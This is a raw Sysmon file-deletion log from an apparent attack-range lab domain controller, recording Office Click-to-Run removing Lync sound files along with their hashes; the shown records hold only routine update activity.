Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Media\PUSH.WAVMD5=7FBD66E4BB1596628CFB606C3635FA11,SHA256=C611CAA62A911BB2387AF89D80059C67C527A7968919242DC7913094B64A8673,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069212Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Media\LYNC_videocall.wavMD5=F77B15F2C0C1564F9E44F5EDA4BDD161,SHA256=D52E5477DD8CE45CD3FA42C6C5F91C7474E1FF9E15D0FE2425BA2EB23CD26148,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069211Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.783{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Media\LYNC_videoadded.wavMD5=5A2A1ED9CA515E9AEAD3C4DF503673F9,SHA256=668430F00439136B86FF38A78223F385C9B53ED58311F7B2CF790AF06332AC3F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069210Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Media\LYNC_untag.wavMD5=F2B4ACA33A86535F3529A1589AF249D1,SHA256=3C4B1E771423E633B018DBEEADD01D8F9082EDED84A6B71AE0A6E3617AAC3D0D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069209Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Media\LYNC_secondcall.wavMD5=6B030F719516D75AB8161D477EE18E1F,SHA256=4C2878EEB6DA734220C2ACBDACAA3BA304BF8E7C3DFAD2878726D95E1AB11BAF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069208Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Media\LYNC_ringtone7.wavMD5=2861DB27A6ADDE885D43F34C4CEB840C,SHA256=13D5848C9D9C1547D93E0FE47942B425466604CA0F64451DE88DF178D4E23750,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069207Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.736{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Media\LYNC_ringtone6.wavMD5=F7BD045B97D067AF7DD8F3ED870D57D5,SHA256=B38B6C8B6B2B11C2C69AC8249205F0290CB8C086423E13D601BB72D9E6D1A1DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069206Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.736{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Media\LYNC_ringtone5.wavMD5=2697CAD4239D1522FAE1AB041C61D01F,SHA256=C41A268118A7F1A70958F9B52F609D17BF2B596B9C6F4D086E14EF38040D5209,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069205Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Media\LYNC_ringtone4.wavMD5=564BE2AFC1621B5B6263F637CB0E20A6,SHA256=F2CFEABA5830DBDA02E31CCB0DCB964CF86A89F17585476F128AC2EBEC7FD5D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069204Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.704{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Media\LYNC_ringtone3.wavMD5=1941146C5219BEB3674A4BF108F20CED,SHA256=FE91BA5ADAE686CCE98D8B203C15F5A8FA79B10AA90ED774F68F86FC505D4318,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069203Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.704{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Media\LYNC_ringtone2.wavMD5=FD9CDB1BEA3C12EE74F4EF9A0C2E72E2,SHA256=7EC53261D6C0F4F88B1C305B7393813F6E02DF069E1776FCF6F15941D33B56A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069202Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Media\LYNC_ringing.wavMD5=F77B15F2C0C1564F9E44F5EDA4BDD161,SHA256=D52E5477DD8CE45CD3FA42C6C5F91C7474E1FF9E15D0FE2425BA2EB23CD26148,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069201Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Media\LYNC_ringback.wavMD5=F77B15F2C0C1564F9E44F5EDA4BDD161,SHA256=D52E5477DD8CE45CD3FA42C6C5F91C7474E1FF9E15D0FE2425BA2EB23CD26148,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069200Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.658{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Media\LYNC_redirect.wavMD5=5995FD2EAFD19776E5BD61CD5B738BD9,SHA256=35964D4FB4908D7C763D622F75B9E82711C943BFE0F8698FB31B3BDECF3B3C5C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069199Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.658{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=42048AFF3C767C8FA6030A5488B28DAA,SHA256=A554730EE188C4FC86496BB1924E2C82A414DA2198300F9AC36AB9204F747C24,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069198Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.642{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Media\LYNC_presence.wavMD5=F3AB61A2CBA6B2FE015E86F9F2D35B6B,SHA256=D305D25E7B1E1CB14884265AE9D76E65ECD88418FA736E002086B4C39A5178C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069197Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.642{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Media\LYNC_onhold.wavMD5=689E8370361E123451336D831230E5F0,SHA256=C97A28E69D94CB02405C0497099F0D7362B66F52B6BB178939DDCA3C1FE79F4C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069196Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.626{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Media\LYNC_newim.wavMD5=3AEBD7F0AA9616D57CC55E4610E384F7,SHA256=536C9FFDD8B196269DCFCF07C9EF7B0E6E12DDCC38730C0FD37D0FE4BF1F5F09,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069195Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.626{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Media\LYNC_muting.wavMD5=6A295536C37DD5E08AF8B8FDD2BB3970,SHA256=1444FD6121E159A96389DE760AEBC2759F1314D5AA3E1F232D25D353EC5C02F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069194Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.611{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Media\LYNC_joinedconference.wavMD5=1A9EC1CA15140836C25CBBA2CE637C60,SHA256=49712F77C84FB8DC5B9F39630DC1A994AA7291547DE5F857ACB4BCEE5C375193,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069193Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.611{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Media\LYNC_istyping.wavMD5=6EA065783B687F23C78BC3F4BF1363B0,SHA256=27954A7C1E6B3E7BA54F9E13659BA9C87B558603C498BA33B1902FAC7373680F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069192Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Media\LYNC_iminvite.wavMD5=3AEBD7F0AA9616D57CC55E4610E384F7,SHA256=536C9FFDD8B196269DCFCF07C9EF7B0E6E12DDCC38730C0FD37D0FE4BF1F5F09,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069191Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.579{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Media\LYNC_howler.wavMD5=FB01121E0D03E2AE82ED32F2345495C9,SHA256=71FD551239909C1EE680791F73836C413ABB6D57DBB27681A97676C02C8CFABC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069190Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.579{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Media\LYNC_fsringing.wavMD5=F77B15F2C0C1564F9E44F5EDA4BDD161,SHA256=D52E5477DD8CE45CD3FA42C6C5F91C7474E1FF9E15D0FE2425BA2EB23CD26148,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069189Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.579{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Media\LYNC_fastbusy.wavMD5=C836763C3A0651E714C471F699B61DDF,SHA256=3408BF9B26F6F8193E3531EC747A23103339B86285D56F98B86136785852026D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069188Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Media\LYNC_dtmfstar.wavMD5=C59AF4661698FDC80B4EB0FCE83DEA54,SHA256=9599368A04A8CB9C64553F43F5896A2C265F2C635FB80CF514C061BFC468FDE1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069187Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Media\LYNC_dtmfpound.wavMD5=13EBD129231F9ADE1A0823473F4BC9BC,SHA256=7290A9B2325AD9CA9152EF38E0A34C680128C17A2BB5032737D8ABF247DDA0C1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069186Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Media\LYNC_dtmf9.wavMD5=03064934DA2B1454A5F574BFD3C8655B,SHA256=36618A02FE07375404D8D63900BA2757EA50DB72F070325573348DAD74457870,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069185Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Media\LYNC_dtmf8.wavMD5=9B43DA128A0E290D5E7091437B303EB1,SHA256=98ED7F1E7C4772DF0C0E1781D00AF15EECA31E7894C85F45C2AE3649751ED18A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069184Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Media\LYNC_dtmf7.wavMD5=891614440D6890BBFA0F998A20D47B9A,SHA256=FDDE9B2553463ACDF7D690900ABA655AFA276084924B428D72370EE28FD5ECF9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069183Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Media\LYNC_dtmf6.wavMD5=8B5E063F52ECC07F60BC23DC6AE518A9,SHA256=1802E65A33DE801E8899097BA4C3823D0EA003857295ACE770704F6565DDFFB0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069182Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Media\LYNC_dtmf5.wavMD5=1E38990F41ED2BF83FBADB702EFCB210,SHA256=EDC738815551C441968D4378D0511EA8B8695DDFD440C6C0A16882EAA52AEE78,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069181Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Media\LYNC_dtmf4.wavMD5=375974432B33349709663DE09AB13D62,SHA256=CFFCA4E5ADDC09FD761EED03C991513257515D6B7B1D4DF8BC879B20B79072A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069180Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Media\LYNC_dtmf3.wavMD5=2E273189254A1139A588995CB1C91248,SHA256=572F5084D75BCCCDAFA07A7A425CC9E5B1BC01DF8D88F1C5CFF05A2B0FDAA0D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069179Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Media\LYNC_dtmf2.wavMD5=11A24FE108394E7E593B02D5D41C33CE,SHA256=26075F68EC6279090B1896D7D537F05782D396D7C7C367498EA36422FA993815,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069178Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Media\LYNC_dtmf1.wavMD5=1A8B64D3153EE4117E9E156991113125,SHA256=AF8DA0AA1E654479F1B3778BFE36E03B4F0AACEBC8B60B22DA3A184B86AB860F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069177Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Media\LYNC_dtmf0.wavMD5=96799C88B83C2F7D4954B5250A36C85B,SHA256=7A00577715939A162A43C50B68F72933FF19258257D0DD3B0460D1E19161E6E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069176Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Media\LYNC_dialtone.wavMD5=1D375FCE4C2F4BBB5BFE013BBF4008D0,SHA256=F9753F609C45601790A839F3CC0C52A6FDD6EA81601DF619EEB00AA6386D0A4A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069175Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Media\LYNC_connecting.wavMD5=D708882EA2727C02C3D9685F1131A769,SHA256=3BF6E64B0FCD1FD26376F38F11F79BED3F22BDDCC1876421549BBE04B178EDB5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069174Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Media\LYNC_ChangeModality.wavMD5=9F53D074768E4EFA772EA03ECABA0FDE,SHA256=BD848E7C3DC0FB7984015C5740713779EE6A33EA166BF8EC3E3AA18D645E6EAA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069173Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Media\LYNC_callended.wavMD5=36725C819F5B9ACA4CE8EE27DED9EA83,SHA256=01F2B6B20DB26E3A26D0E2A35F8D0E0E7B1DC3C919B7B1136E9E1C52B3FE5517,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069172Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Media\LYNC_busy.wavMD5=51D56A69EB11ACE582AB8D0DD636D318,SHA256=092A7B0CBD15DA59910B93E8B43C754317A17017D6587E7F6BBBDB526C519205,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069171Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Media\LYNC_appinvite.wavMD5=3AEBD7F0AA9616D57CC55E4610E384F7,SHA256=536C9FFDD8B196269DCFCF07C9EF7B0E6E12DDCC38730C0FD37D0FE4BF1F5F09,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069170Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Media\LYNC_ActivePresenterChange.wavMD5=1792FFC85D16E3212647BCC8ABDB4164,SHA256=2104BFBF518C926CE1CD5C6F0B095197CF89E117EF7109A5E29BD06DA92771BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069169Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Media\LYNC_abbrdialtone.wavMD5=4EE500BA00890FC8F0E0745C3DD1A159,SHA256=95A7B4310F3D626BFF8FD7C92B9A679B01DE30E55989E2134ED1AB1CDF6EB685,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069168Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 